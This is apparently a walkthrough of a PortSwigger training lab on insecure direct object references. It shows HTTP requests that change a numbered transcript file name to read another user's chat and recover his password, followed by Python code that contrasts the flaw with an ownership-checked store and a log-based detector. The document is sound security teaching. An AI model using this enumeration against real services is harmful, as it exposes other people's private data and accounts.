| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Access Control (IDOR, Static Transcript URLs) |
| Difficulty | Apprentice |
| Objective | Find the password for the user carlos and log into their account |
# Insecure Direct Object References
Going to the live chat, there's a "view transcript" option.
Viewing the transcript downloads 2.txt:

```text
CONNECTED: -- Now chatting with Hal Pline --<br/>You: holaa<br/>Hal Pline: Are you sure you want to know the answer to that?
```
Intercepting this in Burp, the "view transcript" request is a POST that answers with a redirect to a numbered file:

```http
POST /download-transcript HTTP/2
Host: 0a5000950405972383cc9d2d0056008f.web-security-academy.net
(...)

HTTP/2 302 Found
Location: /download-transcript/4.txt
```
Following the redirect:

```http
GET /download-transcript/4.txt HTTP/2
Host: 0a5000950405972383cc9d2d0056008f.web-security-academy.net

HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8

CONNECTED: -- Now chatting with Hal Pline --<br/>You: holaa<br/>Hal Pline: Are you sure you want to know the answer to that?<br/>System: --- Disconnected ---<br/>You: holaa<br/>Hal Pline: Are you sure you want to know the answer to that?<br/>Hal Pline: I heard you the first time, I just can't be bothered to answer you<br/>CONNECTED: -- Now chatting with Hal Pline --<br/>You: tetooo<br/>Hal Pline: Can't you just google it?
```
Transcripts are stored as plain, sequentially numbered files and served straight off the filesystem: the file name in the URL is the only thing selecting the transcript, and nothing ties it to the session that requested it. Trying a lower number:

```http
GET /download-transcript/1.txt HTTP/2
Host: 0a5000950405972383cc9d2d0056008f.web-security-academy.net
```
This is Carlos's chat transcript, and it contains his password. Logging in as carlos with it solves the lab.
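The root cause above is that the handler trusts the file name in the URL and never checks who owns the transcript. The following stand-alone Python simulation is an added example, not the lab's code or PortSwigger's: it puts the lab's vulnerable pattern (return whatever numbered file the URL names) beside a hardened store that issues unguessable transcript ids and checks ownership on every fetch, and adds a small log check a defender can run to spot one session pulling many numbered transcripts. The transcript contents, session ids and log lines are constructed for illustration; the `TranscriptStore` class and `transcripts_per_session` function are hypothetical names, not part of the lab.

```python
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Set, Tuple

# Constructed stand-in for the static transcript directory (file name -> contents).
# Sequential names are the flaw: any logged-in user can guess 1.txt, 2.txt, ...
STATIC_TRANSCRIPT_DIR: Dict[str, str] = {
    "1.txt": "CONNECTED: -- Now chatting with Hal Pline --\n"
             "You: what is my password?\n"
             "Hal Pline: [constructed placeholder, not the lab's value]",
    "4.txt": "CONNECTED: -- Now chatting with Hal Pline --\n"
             "You: holaa\n"
             "Hal Pline: Are you sure you want to know the answer to that?",
}


def download_transcript_vulnerable(requested_name: str) -> Optional[str]:
    """Mirrors the lab handler: returns whatever file the URL names.

    Nothing links the file to the session asking for it, so changing
    4.txt to 1.txt hands back another user's transcript.
    """
    return STATIC_TRANSCRIPT_DIR.get(requested_name)


@dataclass
class TranscriptStore:
    """Hardened version (hypothetical): transcripts are keyed by a random,
    unguessable id and every fetch is checked against the owner recorded
    when the transcript was saved."""

    _records: Dict[str, Tuple[str, str]] = field(default_factory=dict)

    def save(self, owner: str, content: str) -> str:
        # 128 bits of randomness: the id cannot be enumerated like 1, 2, 3...
        transcript_id = secrets.token_urlsafe(16)
        self._records[transcript_id] = (owner, content)
        return transcript_id

    def fetch(self, session_user: str, transcript_id: str) -> Optional[str]:
        record = self._records.get(transcript_id)
        # Identical outcome for "does not exist" and "belongs to someone else",
        # so a probing client learns nothing about which ids are in use.
        if record is None or record[0] != session_user:
            return None
        return record[1]


# Constructed access-log lines: session id, method, path, status.
SAMPLE_ACCESS_LOG = """\
sess=aa11 GET /download-transcript/4.txt 200
sess=aa11 GET /download-transcript/3.txt 200
sess=aa11 GET /download-transcript/2.txt 200
sess=aa11 GET /download-transcript/1.txt 200
sess=bb22 GET /download-transcript/7.txt 200
sess=bb22 GET /static/app.js 200
"""


def transcripts_per_session(log_text: str) -> Dict[str, int]:
    """Count the distinct transcript files each session downloaded.

    A session that retrieves several numbered transcripts in a row is the
    IDOR signature a detection rule should alert on; a normal user only
    ever downloads the transcript of their own chat.
    """
    seen: Dict[str, Set[str]] = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[2].startswith("/download-transcript/"):
            continue
        session = parts[0].split("=", 1)[1]
        seen.setdefault(session, set()).add(parts[2])
    return {session: len(names) for session, names in seen.items()}


if __name__ == "__main__":
    # Vulnerable: the numbered name alone selects the file.
    print("vulnerable 1.txt ->", download_transcript_vulnerable("1.txt") is not None)
    # Hardened: only the owner of a transcript can read it.
    store = TranscriptStore()
    tid = store.save("carlos", "constructed transcript body")
    print("owner fetch ->", store.fetch("carlos", tid) is not None)
    print("other-user fetch ->", store.fetch("wiener", tid))
    print("sessions ->", transcripts_per_session(SAMPLE_ACCESS_LOG))
```

The hardened store fixes both halves of the problem: the id is not guessable, and even a leaked id is useless to a session that does not own it. The log check is deliberately crude (distinct transcript paths per session); in a real deployment the threshold and the session key would come from your own access-log format.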